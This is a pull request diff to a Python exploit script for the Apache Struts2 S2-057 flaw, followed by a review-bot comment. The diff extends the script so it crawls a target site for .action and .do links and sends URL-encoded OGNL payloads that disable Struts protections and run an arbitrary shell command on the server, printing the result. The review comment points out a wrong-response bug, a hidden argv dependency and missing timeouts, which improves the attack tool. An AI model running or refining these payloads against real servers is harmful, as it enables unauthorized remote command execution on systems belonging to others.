Feat/fix exp #4

Open
wants to merge 3 commits into
base: master
7 changes: 7 additions & 0 deletions .idea/misc.xml


8 changes: 8 additions & 0 deletions .idea/modules.xml


11 changes: 11 additions & 0 deletions .idea/struts2-057-exp.iml


6 changes: 6 additions & 0 deletions .idea/vcs.xml


143 changes: 143 additions & 0 deletions .idea/workspace.xml


60 changes: 42 additions & 18 deletions s2_057_exp.py
Expand Up @@ -2,29 +2,53 @@
#author: 360云影实验室 (icematcha@360Yunyinglab, [email protected])
import requests
import sys
from urlparse import urljoin, urlparse
import re

def expliot(host, command, path):
payload = '%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27'+ command +'%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'
payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27'+command+'%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/'

url = host+payload+path
url1 = host+payload1+path
def gen_paylaod(uri, payload):
prefix = '/'.join(uri.split('/')[:-1])
urlpack = urlparse(sys.argv[1].strip())
url = urlpack.scheme + '://' + urlpack.netloc + prefix + '/' + payload + uri.split(prefix)[1]
return url

res = requests.get(url, allow_redirects=False)
res1 = requests.get(url1, allow_redirects=False)
def expliot(host , command):
def get_all_actions(host):
resp = requests.get(host).content
match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:action|do))''', resp)
return match

if res.status_code == 200 and res1.status_code != 200:
print "Exploit successful:"
print res.content
elif res1.status_code == 200 and res.status_code != 200:
print "Exploit successful:"
print res1.content
else:
print('The target is likely unvulnerable,mabye your struts2 version is too high!')
link_list = get_all_actions(host)

payload = '%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27'+ command +'%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D'
payload1 = '%24%7B%28%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27'+command+'%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D'

for _uri in link_list:
try:
payload_url = gen_paylaod(_uri , payload)
payload_url1 = gen_paylaod(_uri , payload1)

res = requests.get(payload_url, allow_redirects=False)
res1 = requests.get(payload_url1, allow_redirects=False)
if res.status_code == 200 and res1.status_code != 200:
return res.content
elif res1.status_code == 200 and res.status_code != 200:
return res.content
else:
pass
except Exception as e:
print e
return None


if __name__ == '__main__':
if len(sys.argv) < 4:
print("Usage: python s2-057-exp.py http://www.xxx.com/ {command} {The path such as:actionChain1.action}")
if len(sys.argv) < 3:
print("Usage: python s2-057-exp.py http://www.xxx.com/ {command}")
else:
expliot(sys.argv[1].strip(), sys.argv[2], sys.argv[3].strip())
res = expliot(sys.argv[1].strip(), sys.argv[2])
if res:
print "Exploit successful:"
print res
else:
print('The target is likely unvulnerable,mabye your struts2 version is too high!')
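Review bot: The second success branch in the new `expliot` returns the wrong response: `elif res1.status_code == 200 and res.status_code != 200:` is followed by `return res.content`, the body of the request that did not return 200, whereas the removed code printed `res1.content` at that point; it should read `return res1.content`. As written, the caller prints "Exploit successful:" followed by an unrelated error or redirect body, so the verdict cannot be trusted when the script is used to confirm whether a host is still unpatched. Separately, `gen_paylaod` reads `sys.argv[1]` instead of receiving the host as a parameter, which ties the helper to the command line and hides the dependency from `expliot`. The broad `except Exception as e: print e` in the loop also reduces every failure to a printed line, and none of the `requests.get` calls sets a `timeout`, so a stalled server hangs the run.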